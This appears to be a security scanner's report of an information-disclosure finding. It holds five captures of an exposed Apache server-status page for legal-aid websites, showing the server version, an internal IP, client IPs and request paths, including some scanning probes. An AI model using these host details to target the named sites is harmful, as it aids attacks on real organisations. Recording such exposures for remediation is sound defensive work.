Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 29-Nov-2025 05:38:23 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 4 Parent Server MPM Generation: 3 Server uptime: 3 days 13 hours 1 minute 32 seconds Server load: 0.00 0.00 0.00 Total accesses: 3039 - Total Traffic: 116.0 MB CPU Usage: u80.93 s6.09 cu0 cs0 - .0284% CPU load .00993 requests/sec - 397 B/second - 39.1 kB/request 1 requests currently being processed, 9 idle workers ___.___.__.W._.................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-3254260/40/226_ 5.1865300.02.129.52 3.132.23.201http/1.1atlantalegalaid.org:8080SSH-2.0-Go 1-3263520/59/203_ 3.21148400.01.196.83 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-3223540/137/257_ 9.397266480.04.299.28 3.132.23.201http/1.1atlantalegalaid.org:8080\x16\x03\x01 3-3-0/0/158. 1.582973900.00.007.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-3254310/41/262_ 5.0993700.01.789.70 3.132.23.201http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 5-3263630/27/202_ 3.2958500.01.267.47 3.132.23.201http/1.1atlantalegalaid.org:8080\x16\x03\x01 6-3223900/53/246_ 7.10362750.02.979.45 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 7-3-0/0/287. 7.102974000.00.009.55 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-3223950/43/193_ 5.437202830.01.987.77 3.132.23.201http/1.1atlantalegalaid.org:8080\n 9-3223700/76/153_ 9.68172710.03.907.67 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 10-3-0/0/271. 7.974282800.00.007.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-32237523/77/140W 7.430026.62.866.35 130.176.208.182http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 12-3-0/0/186. 4.442974100.00.006.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-3254410/36/113_ 4.6880500.01.525.76 3.132.23.201http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 14-3-0/0/97. 0.004288800.00.003.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-1-0/0/6. 0.6824437200.00.000.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-1-0/0/10. 1.3024440300.00.000.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-1-0/0/6. 0.6924437600.00.000.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-1-0/0/1. 0.0024441200.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-1-0/0/9. 1.2224437000.00.000.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-1-0/0/1. 0.0024441100.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-1-0/0/10. 1.5624437100.00.000.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-1-0/0/1. 0.0024440900.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-1-0/0/1. 0.0024441000.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.picturingjustice.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd97968de9da2
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Thursday, 27-Nov-2025 01:25:12 UTC Restart Time: Tuesday, 25-Nov-2025 16:36:51 UTC Parent Server Config. Generation: 2 Parent Server MPM Generation: 1 Server uptime: 1 day 8 hours 48 minutes 21 seconds Server load: 0.00 0.00 0.00 Total accesses: 1441 - Total Traffic: 59.6 MB CPU Usage: u62.05 s4.6 cu0 cs0 - .0564% CPU load .0122 requests/sec - 529 B/second - 42.4 kB/request 1 requests currently being processed, 9 idle workers ___._._W_.__._.................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-170010/45/119_ 6.6462731290.02.255.22 46.161.50.108http/1.1atlantalegalaid.org:8080\x16\x03\x02\x01o\x01 1-183290/7/86_ 0.56879100.00.143.19 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-182750/31/107_ 4.73152720.01.974.45 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 3-1-0/0/103. 1.635642200.00.004.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 4-170020/40/116_ 6.031167000.01.824.73 20.118.233.189http/1.1atlantalegalaid.org:8080GET /hudson HTTP/1.1 5-1-0/0/131. 4.895638200.00.004.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-170070/35/110_ 8.23142500.01.604.78 185.226.197.74http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 7-1700823/85/153W 3.430026.62.515.07 130.176.208.182http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 8-170130/45/101_ 4.861383800.02.043.93 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 9-1-0/0/70. 3.575638300.00.003.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-182350/61/113_ 3.43527300.01.293.58 18.68.41.39http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 11-182400/26/41_ 3.42322710.01.582.37 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 12-1-0/0/63. 2.365641700.00.003.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-182500/31/49_ 3.94358100.01.742.79 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 14-1-0/0/34. 3.485638400.00.001.96 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-1-0/0/6. 0.685638100.00.000.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-1-0/0/10. 1.305641200.00.000.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-1-0/0/6. 0.695638500.00.000.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-1-0/0/1. 0.005642100.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-1-0/0/9. 1.225637900.00.000.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-1-0/0/1. 0.005642000.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-1-0/0/10. 1.565638000.00.000.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-1-0/0/1. 0.005641800.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-1-0/0/1. 0.005641900.00.000.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache/2.4.29 (Ubuntu) Server at www.picturingjustice.org Port 80
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd97996de9c11
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Sunday, 23-Nov-2025 09:01:06 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 594 Parent Server MPM Generation: 593 Server uptime: 592 days 16 hours 6 minutes 33 seconds Server load: 0.00 0.00 0.00 Total accesses: 13768022 - Total Traffic: 196.2 GB CPU Usage: u86.3 s7.64 cu0 cs0 - .000183% CPU load .269 requests/sec - 4114 B/second - 14.9 kB/request 1 requests currently being processed, 6 idle workers _W___.__........................................................ ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-593206160/24/813403_ 4.8230032780.01.5113524.41 3.172.105.70http/1.1atlantalegalaid.org:8080GET /public/laravel-file-manager/tinymce HTTP/1.1 1-5932062123/31/790115W 1.390026.60.4213127.65 130.176.208.182http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 2-593207770/10/758597_ 2.751511690.00.4012976.31 147.135.11.223http/1.1atlantalegalaid.org:8080\x16\x03\x01\x02 3-593211450/5/740712_ 0.86270300.00.2612436.75 176.65.149.164http/1.1atlantalegalaid.org:8080GET /login HTTP/1.1 4-593206110/5/720969_ 0.66152720.00.4511910.53 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 5-592-0/0/700116. 0.45936400.00.0011610.59 159.203.62.212http/1.1 6-593206050/4/661168_ 0.70257800.00.0310931.97 205.210.31.235http/1.1atlantalegalaid.org:8080GET / HTTP/1.0 7-593206060/41/636309_ 0.67341800.00.6110440.38 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 8-592-0/0/604008. 0.006340000.00.009832.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-592-0/0/584155. 1.05936400.00.009232.07 130.176.218.136http/1.1atlantalegalaid.org:8080GET /robots.txt HTTP/1.1 10-592-0/0/514637. 0.006340100.00.008785.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-592-0/0/478945. 0.006339900.00.007907.14 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-592-0/0/415332. 0.7293643450.00.006621.23 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 13-592-0/0/328982. 0.15936400.00.004811.60 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 14-592-0/0/289623. 1.20936400.00.004308.49 3.172.90.70http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 15-592-0/0/265359. 0.006340700.00.003799.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-592-0/0/230553. 0.006340600.00.003443.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-592-0/0/167883. 0.006340500.00.002347.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-592-0/0/145464. 0.006340300.00.002064.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-591-0/0/137653. 0.0012610100.00.002104.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-589-0/0/128327. 0.2032299500.00.001824.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-589-0/0/116787. 3.0231364400.00.001694.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-589-0/0/121177. 0.0432300300.00.001645.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-589-0/0/106169. 0.1832161300.00.001537.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-589-0/0/108758. 0.3132300400.00.001366.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-589-0/0/86009. 0.0032332600.00.001085.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-589-0/0/68650. 0.0032332500.00.001013.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-589-0/0/65111. 0.0032332400.00.00879.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-589-0/0/61981. 0.0032332300.00.00806.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-589-0/0/56797. 0.0032332200.00.00693.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-589-0/0/58169. 0.0032332100.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-589-0/0/53040. 0.0032332000.00.00675.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-589-0/0/57082. 0.0032331900.00.00733.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-589-0/0/53413. 0.0032331800.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-589-0/0/56667. 0.0032331700.00.00671.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-589-0/0/56165. 0.0032331600.00.00668.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-589-0/0/54018. 0.0032331500.00.00655.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-589-0/0/50615. 0.0032331400.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-589-0/0/56921. 0.0032331300.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-589-0/0/50170. 0.0032331200.00.00563.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-589-0/0/49228. 0.0032331100.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-588-0/0/31023. 0.0039406200.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-588-0/0/31949. 0.0039406100.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-588-0/0/31607. 0.0039406000.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-588-0/0/31940. 0.2139388900.00.00329.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-588-0/0/32832. 0.2439386400.00.00314.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001453491000.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001453490900.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001453490800.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001453490700.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001453490600.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001453490500.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001453490400.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001453490300.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001453490200.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001453490100.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.001453490000.00.00294.75 ::1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979550ef789
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 21-Nov-2025 12:27:33 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 592 Parent Server MPM Generation: 591 Server uptime: 590 days 19 hours 33 minutes Server load: 0.00 0.00 0.00 Total accesses: 13766615 - Total Traffic: 196.2 GB CPU Usage: u87.16 s7.41 cu0 cs0 - .000185% CPU load .27 requests/sec - 4126 B/second - 14.9 kB/request 1 requests currently being processed, 8 idle workers ___W____...._................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-59151700/34/813235_ 2.58189400.00.7313518.83 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 1-59150160/29/790000_ 1.38142700.01.1413126.22 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 2-59151790/29/758468_ 1.777871800.00.4112973.35 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1763727258.346874952316284 3-591502123/87/740658W 1.920026.60.6912435.49 130.176.208.182http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 4-59158780/13/720897_ 0.1441791980.00.0111908.81 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1763723866.406635999679565 5-59158830/5/700054_ 0.407874420.00.0711600.08 3.172.105.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 6-59150260/24/661016_ 0.78441810.00.9110930.19 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 7-59150370/57/636171_ 0.4641794710.00.1610438.39 15.158.40.136http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 8-590-0/0/603928. 1.085582200.00.009829.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-590-0/0/584035. 2.222175100.00.009231.33 15.158.40.178http/1.1elearning.alas.org:8080GET //site/wp-includes/wlwmanifest.xml HTTP/1.1 10-590-0/0/514631. 0.452175100.00.008785.87 15.158.40.139http/1.1elearning.alas.org:8080GET //cms/wp-includes/wlwmanifest.xml HTTP/1.1 11-590-0/0/478909. 0.245582300.00.007907.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-59150140/22/415263_ 1.60615800.00.086619.78 18.68.45.176http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 13-590-0/0/328943. 0.242175100.00.004811.10 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 14-589-0/0/289593. 0.0013729000.00.004308.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-589-0/0/265354. 0.0013728900.00.003799.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-589-0/0/230532. 0.0013728800.00.003443.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-589-0/0/167775. 0.2115829100.00.002341.17 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-589-0/0/145462. 0.0016259300.00.002064.41 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-589-0/0/137652. 0.5816259200.00.002104.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-589-0/0/128327. 0.2016258200.00.001824.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-589-0/0/116787. 3.0215323100.00.001694.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-589-0/0/121177. 0.0416259000.00.001645.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-589-0/0/106169. 0.1816120000.00.001537.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-589-0/0/108758. 0.3116259100.00.001366.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-589-0/0/86009. 0.0016291300.00.001085.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-589-0/0/68650. 0.0016291200.00.001013.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-589-0/0/65111. 0.0016291100.00.00879.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-589-0/0/61981. 0.0016291000.00.00806.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-589-0/0/56797. 0.0016290900.00.00693.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-589-0/0/58169. 0.0016290800.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-589-0/0/53040. 0.0016290700.00.00675.15 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-589-0/0/57082. 0.0016290600.00.00733.23 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-589-0/0/53413. 0.0016290500.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-589-0/0/56667. 0.0016290400.00.00671.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-589-0/0/56165. 0.0016290300.00.00668.42 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-589-0/0/54018. 0.0016290200.00.00655.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-589-0/0/50615. 0.0016290100.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-589-0/0/56921. 0.0016290000.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-589-0/0/50170. 0.0016289900.00.00563.28 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-589-0/0/49228. 0.0016289800.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-588-0/0/31023. 0.0023364900.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-588-0/0/31949. 0.0023364800.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-588-0/0/31607. 0.0023364700.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-588-0/0/31940. 0.2123347600.00.00329.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-588-0/0/32832. 0.2423345100.00.00314.27 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001437449700.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001437449600.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001437449500.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001437449400.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001437449300.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001437449200.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001437449100.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001437449000.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001437448900.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001437448800.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979a21e7406
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Sunday, 16-Nov-2025 22:00:34 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 587 Parent Server MPM Generation: 586 Server uptime: 586 days 5 hours 6 minutes 1 second Server load: 0.00 0.00 0.00 Total accesses: 13762578 - Total Traffic: 195.8 GB CPU Usage: u312.63 s26.85 cu0 cs0 - .00067% CPU load .272 requests/sec - 4150 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers ...______W_.__.................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-586-0/0/812885. 2.073635000.00.0013481.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-586-0/0/789729. 2.783635100.00.0013084.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 2-586-0/0/758140. 1.883634700.00.0012948.06 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-586316880/21/740321_ 2.2998600.00.6512419.10 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 4-586316950/55/720601_ 2.83601500.00.8311893.33 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 5-586317040/23/699814_ 3.00445700.01.0211567.03 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 6-586303450/91/660791_ 9.8991810.01.4510906.47 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 7-586317090/89/635853_ 3.51641014210.00.8610403.46 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1763324022.971370935440063 8-586303460/62/603743_ 3.76444300.00.979814.81 64.225.101.76http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 9-5863241623/44/583815W 3.230026.61.019225.57 130.176.208.182http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 10-586324210/56/514463_ 2.9670700.01.408755.36 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 11-586-0/0/478799. 2.133634900.00.007904.95 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-586324260/9/415035_ 0.46101810.00.876597.25 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 13-586324310/15/328829_ 2.16640311710.00.604791.04 15.158.226.76http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 14-586-0/0/289514. 0.003634800.00.004307.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-585-0/0/265275. 4.5610738300.00.003780.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-585-0/0/230473. 0.7711551000.00.003442.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-580-0/0/167742. 17.7849420300.00.002340.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-579-0/0/145444. 0.0059107400.00.002064.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-579-0/0/137616. 2.2759108500.00.002104.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-579-0/0/128299. 3.4258437000.00.001823.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-579-0/0/116746. 0.8759108300.00.001693.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-579-0/0/121137. 0.0059107700.00.001644.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-579-0/0/106118. 0.965745322630.00.001535.83 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api HTTP/1.1 24-579-0/0/108741. 0.0059107600.00.001366.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-579-0/0/86001. 0.0061945600.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-579-0/0/68645. 0.0061945400.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-579-0/0/65061. 0.0061945200.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00286143500.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00286143300.00.00693.67 